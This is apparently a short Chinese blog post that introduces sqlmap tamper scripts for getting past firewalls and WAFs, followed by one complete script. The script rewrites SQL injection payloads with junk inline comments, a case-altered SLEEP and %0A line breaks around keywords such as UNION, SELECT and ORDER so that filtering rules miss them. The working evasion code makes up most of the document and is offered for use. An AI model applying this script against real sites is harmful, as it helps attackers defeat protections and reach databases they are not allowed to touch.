总结一下tamper
0x00 绕过防火墙
防火墙的规则肯定是没有WAF更新的那么快,所以要写一个比较实用的、容易变通的tamper:
#!/usr/bin/env python
import re
from lib.core.enums import PRIORITY
# Ordering hint read by sqlmap when several tamper scripts are chained;
# HIGHEST places this script's substitutions before the other tampers'.
__priority__ = PRIORITY.HIGHEST
def dependencies():
    """sqlmap hook for declaring prerequisites; this script has none."""
    return None
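# Ordered (old, new) pairs applied by tamper(). Each pair is a plain,
# case-sensitive str.replace over the whole payload, and the pairs run in
# this order, so a later pair also sees text inserted by an earlier one
# (e.g. "VARCHAR(" is rewritten before "CHR(" is looked for).
# Every inserted fragment is a fixed literal; from a detection standpoint
# those literals are themselves stable signatures in the resulting request.
_SUBSTITUTIONS = (
    ("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),"),
    ("AND", "/* (;.../+___io1d_6^1``)*/AND"),
    ("SLEEP", "sLEep"),
    ("ASCII(", "ASCII/*i({].,$$!~!<)*/("),
    ("VARCHAR(", "VARCHAR/**/("),
    ("CHR(", "CHR/*io%!`;/.,-=+/2*/("),
    # The original wrote "\D", an invalid escape sequence (SyntaxWarning on
    # recent Pythons); "\\D" yields the identical backslash-D string.
    ("(SELECT", "/*`^~`\\Ddhsjnnw_+ddsws//- */( SELECT"),
    ("UNION", "/*PPdd{[;!`(_.,>?l}*/ UNION%0A"),
    ("ORDER", "ORDER%0A"),
    ("EXISTS", "EXISTS%0A"),
    ("LIMIT", "LIMIT%0A"),
)


def tamper(payload, **kwargs):
    """Rewrite *payload* with the fixed substitution table above.

    sqlmap calls this hook once per payload. The rewrite inserts inline
    comments, a changed-case SLEEP and ``%0A`` sequences around a handful
    of uppercase SQL keywords; it is purely textual and does not parse SQL.

    Args:
        payload: The payload string produced by sqlmap.
        **kwargs: Accepted for sqlmap's hook signature; unused here.

    Returns:
        The rewritten string, or *payload* unchanged when it is empty or
        ``None``.
    """
    if not payload:
        # Preserve the original guard: None and "" pass through untouched.
        return payload
    for old, new in _SUBSTITUTIONS:
        payload = payload.replace(old, new)
    return payload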